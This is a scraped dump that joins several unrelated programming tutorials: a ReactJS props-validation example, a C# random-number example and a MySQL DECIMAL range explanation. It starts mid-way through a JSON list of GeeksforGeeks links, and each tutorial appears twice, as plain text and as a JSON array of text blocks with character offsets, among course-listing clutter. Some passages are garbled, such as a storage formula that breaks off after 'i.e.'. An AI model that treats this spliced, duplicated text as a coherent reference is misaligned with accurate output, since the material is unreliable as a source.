datetime-program" }, { "code": null, "e": 27503, "s": 27487, "text": "Python-datetime" }, { "code": null, "e": 27510, "s": 27503, "text": "Python" }, { "code": null, "e": 27608, "s": 27510, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 27617, "s": 27608, "text": "Comments" }, { "code": null, "e": 27630, "s": 27617, "text": "Old Comments" }, { "code": null, "e": 27667, "s": 27630, "text": "Create a Pandas DataFrame from Lists" }, { "code": null, "e": 27703, "s": 27667, "text": "Box Plot in Python using Matplotlib" }, { "code": null, "e": 27721, "s": 27703, "text": "Python Dictionary" }, { "code": null, "e": 27744, "s": 27721, "text": "Bar Plot in Matplotlib" }, { "code": null, "e": 27766, "s": 27744, "text": "Enumerate() in Python" }, { "code": null, "e": 27805, "s": 27766, "text": "Python | Get dictionary keys as a list" }, { "code": null, "e": 27838, "s": 27805, "text": "Python | Convert set into a list" }, { "code": null, "e": 27887, "s": 27838, "text": "Ways to filter Pandas DataFrame by column values" }, { "code": null, "e": 27920, "s": 27887, "text": "Graph Plotting in Python | Set 1" } ]
ReactJS - Props Validation
Properties validation is a useful way to force the correct usage of the components. This will help during development to avoid future bugs and problems, once the app becomes larger. It also makes the code more readable, since we can see how each component should be used. In this example, we are creating App component with all the props that we need. App.propTypes is used for props validation. If some of the props aren't using the correct type that we assigned, we will get a console warning. After we specify validation patterns, we will set App.defaultProps. import React from 'react'; class App extends React.Component { render() { return ( <div> <h3>Array: {this.props.propArray}</h3> <h3>Bool: {this.props.propBool ? "True..." : "False..."}</h3> <h3>Func: {this.props.propFunc(3)}</h3> <h3>Number: {this.props.propNumber}</h3> <h3>String: {this.props.propString}</h3> <h3>Object: {this.props.propObject.objectName1}</h3> <h3>Object: {this.props.propObject.objectName2}</h3> <h3>Object: {this.props.propObject.objectName3}</h3> </div> ); } } App.propTypes = { propArray: React.PropTypes.array.isRequired, propBool: React.PropTypes.bool.isRequired, propFunc: React.PropTypes.func, propNumber: React.PropTypes.number, propString: React.PropTypes.string, propObject: React.PropTypes.object } App.defaultProps = { propArray: [1,2,3,4,5], propBool: true, propFunc: function(e){return e}, propNumber: 1, propString: "String value...", propObject: { objectName1:"objectValue1", objectName2: "objectValue2", objectName3: "objectValue3" } } export default App; import React from 'react'; import ReactDOM from 'react-dom'; import App from './App.jsx'; ReactDOM.render(<App/>, document.getElementById('app')); 20 Lectures 1.5 hours Anadi Sharma 60 Lectures 4.5 hours Skillbakerystudios 165 Lectures 13 hours Paul Carlo Tordecilla 63 Lectures 9.5 hours TELCOMA Global 17 Lectures 2 hours Mohd Raqif Warsi Print Add Notes Bookmark this page
[ { "code": null, "e": 2305, "s": 2033, "text": "Properties validation is a useful way to force the correct usage of the components. This will help during development to avoid future bugs and problems, once the app becomes larger. It also makes the code more readable, since we can see how each component should be used." }, { "code": null, "e": 2597, "s": 2305, "text": "In this example, we are creating App component with all the props that we need. App.propTypes is used for props validation. If some of the props aren't using the correct type that we assigned, we will get a console warning. After we specify validation patterns, we will set App.defaultProps." }, { "code": null, "e": 3788, "s": 2597, "text": "import React from 'react';\n\nclass App extends React.Component {\n render() {\n return (\n <div>\n <h3>Array: {this.props.propArray}</h3>\n <h3>Bool: {this.props.propBool ? \"True...\" : \"False...\"}</h3>\n <h3>Func: {this.props.propFunc(3)}</h3>\n <h3>Number: {this.props.propNumber}</h3>\n <h3>String: {this.props.propString}</h3>\n <h3>Object: {this.props.propObject.objectName1}</h3>\n <h3>Object: {this.props.propObject.objectName2}</h3>\n <h3>Object: {this.props.propObject.objectName3}</h3>\n </div>\n );\n }\n}\n\nApp.propTypes = {\n propArray: React.PropTypes.array.isRequired,\n propBool: React.PropTypes.bool.isRequired,\n propFunc: React.PropTypes.func,\n propNumber: React.PropTypes.number,\n propString: React.PropTypes.string,\n propObject: React.PropTypes.object\n}\n\nApp.defaultProps = {\n propArray: [1,2,3,4,5],\n propBool: true,\n propFunc: function(e){return e},\n propNumber: 1,\n propString: \"String value...\",\n \n propObject: {\n objectName1:\"objectValue1\",\n objectName2: \"objectValue2\",\n objectName3: \"objectValue3\"\n }\n}\nexport default App;" }, { "code": null, "e": 3936, "s": 3788, "text": "import React from 'react';\nimport ReactDOM from 'react-dom';\nimport App from './App.jsx';\n\nReactDOM.render(<App/>, document.getElementById('app'));" }, { "code": null, "e": 3971, "s": 3936, "text": "\n 20 Lectures \n 1.5 hours \n" }, { "code": null, "e": 3985, "s": 3971, "text": " Anadi Sharma" }, { "code": null, "e": 4020, "s": 3985, "text": "\n 60 Lectures \n 4.5 hours \n" }, { "code": null, "e": 4040, "s": 4020, "text": " Skillbakerystudios" }, { "code": null, "e": 4075, "s": 4040, "text": "\n 165 Lectures \n 13 hours \n" }, { "code": null, "e": 4098, "s": 4075, "text": " Paul Carlo Tordecilla" }, { "code": null, "e": 4133, "s": 4098, "text": "\n 63 Lectures \n 9.5 hours \n" }, { "code": null, "e": 4149, "s": 4133, "text": " TELCOMA Global" }, { "code": null, "e": 4182, "s": 4149, "text": "\n 17 Lectures \n 2 hours \n" }, { "code": null, "e": 4200, "s": 4182, "text": " Mohd Raqif Warsi" }, { "code": null, "e": 4207, "s": 4200, "text": " Print" }, { "code": null, "e": 4218, "s": 4207, "text": " Add Notes" } ]
Random Numbers in C#
To generate random numbers in C#, use the Next(minValue, MaxValue) method. The parameters are used to set the minimum and maximum values. Next(100,200); We have set the above method under Random() object. Random rd = new Random(); int rand_num = rd.Next(100,200); The following is an example − Live Demo using System; class Program { static void Main() { Random rd = new Random(); int rand_num = rd.Next(100,200); Console.WriteLine(rand_num); } } 182
[ { "code": null, "e": 1200, "s": 1062, "text": "To generate random numbers in C#, use the Next(minValue, MaxValue) method. The parameters are used to set the minimum and maximum values." }, { "code": null, "e": 1215, "s": 1200, "text": "Next(100,200);" }, { "code": null, "e": 1267, "s": 1215, "text": "We have set the above method under Random() object." }, { "code": null, "e": 1326, "s": 1267, "text": "Random rd = new Random();\nint rand_num = rd.Next(100,200);" }, { "code": null, "e": 1356, "s": 1326, "text": "The following is an example −" }, { "code": null, "e": 1367, "s": 1356, "text": " Live Demo" }, { "code": null, "e": 1536, "s": 1367, "text": "using System;\nclass Program {\n static void Main() {\n Random rd = new Random();\n\n int rand_num = rd.Next(100,200);\n\n Console.WriteLine(rand_num);\n }\n}" }, { "code": null, "e": 1540, "s": 1536, "text": "182" } ]
What is the range of MySQL DECIMAL(x,0)?
The range of DECIMAL data type is more than the INTEGER data type and BIGINT. As we know the BIGINT can store 18446744073709551615 while in DECIMAL you can store DECIMAL(65,0) where x represents the 65 nines(9). The DECIMAL stores the number in bytes and the storage requirement formula is: DECIMAL(x,0) i.e. StorageRequirementInBytes = (x/9) + remaining; WHERE remaining = round_up( (x%9) / 2 ) The DECIMAL(65,0) storage is as follows − 99999999999999999999999999999999999999999999999999999999999999999 To understand what we discussed above, let us create a table. The query to create a table is as follows − mysql> create table DecimalDemo -> ( -> UserId DECIMAL(65,0) -> ); Query OK, 0 rows affected (0.62 sec) Now you can insert some records in the table using insert command. The query is as follows − mysql> insert into DecimalDemo values(99999999999999999999999999999999999999999999999999999999999999999); Query OK, 1 row affected (0.16 sec) mysql> insert into DecimalDemo values(99999999999999999999999999999999999999999999999999999999999999999.0); Query OK, 1 row affected (0.28 sec) Display all records from the table using a select statement. The query is as follows − mysql> select *from DecimalDemo; +-------------------------------------------------------------------+ | UserId | +-------------------------------------------------------------------+ | 99999999999999999999999999999999999999999999999999999999999999999 | | 99999999999999999999999999999999999999999999999999999999999999999 | +-------------------------------------------------------------------+ 2 rows in set (0.00 sec) If you try to give 66 at the time of creation of the table, you will get the following error − mysql> create table DecimalDemo1 -> ( -> UserId DECIMAL(66,0) -> ); ERROR 1426 (42000): Too-big precision 66 specified for 'UserId'. Maximum is 65.
[ { "code": null, "e": 1371, "s": 1062, "text": "The range of DECIMAL data type is more than the INTEGER data type and BIGINT. As we know the BIGINT can store 18446744073709551615 while in DECIMAL you can store DECIMAL(65,0) where x represents the 65 nines(9). The DECIMAL stores the number in bytes and the storage requirement formula is: DECIMAL(x,0) i.e." }, { "code": null, "e": 1458, "s": 1371, "text": "StorageRequirementInBytes = (x/9) + remaining;\nWHERE remaining = round_up( (x%9) / 2 )" }, { "code": null, "e": 1500, "s": 1458, "text": "The DECIMAL(65,0) storage is as follows −" }, { "code": null, "e": 1566, "s": 1500, "text": "99999999999999999999999999999999999999999999999999999999999999999" }, { "code": null, "e": 1672, "s": 1566, "text": "To understand what we discussed above, let us create a table. The query to create a table is as follows −" }, { "code": null, "e": 1776, "s": 1672, "text": "mysql> create table DecimalDemo\n-> (\n-> UserId DECIMAL(65,0)\n-> );\nQuery OK, 0 rows affected (0.62 sec)" }, { "code": null, "e": 1869, "s": 1776, "text": "Now you can insert some records in the table using insert command. The query is as follows −" }, { "code": null, "e": 2155, "s": 1869, "text": "mysql> insert into DecimalDemo\nvalues(99999999999999999999999999999999999999999999999999999999999999999);\nQuery OK, 1 row affected (0.16 sec)\nmysql> insert into DecimalDemo\nvalues(99999999999999999999999999999999999999999999999999999999999999999.0);\nQuery OK, 1 row affected (0.28 sec)" }, { "code": null, "e": 2242, "s": 2155, "text": "Display all records from the table using a select statement. The query is as follows −" }, { "code": null, "e": 2275, "s": 2242, "text": "mysql> select *from DecimalDemo;" }, { "code": null, "e": 2661, "s": 2275, "text": "+-------------------------------------------------------------------+\n| UserId |\n+-------------------------------------------------------------------+\n| 99999999999999999999999999999999999999999999999999999999999999999 |\n| 99999999999999999999999999999999999999999999999999999999999999999 |\n+-------------------------------------------------------------------+\n2 rows in set (0.00 sec)" }, { "code": null, "e": 2756, "s": 2661, "text": "If you try to give 66 at the time of creation of the table, you will get the following error −" }, { "code": null, "e": 2904, "s": 2756, "text": "mysql> create table DecimalDemo1\n-> (\n-> UserId DECIMAL(66,0)\n-> );\nERROR 1426 (42000): Too-big precision 66 specified for 'UserId'. Maximum is 65." } ]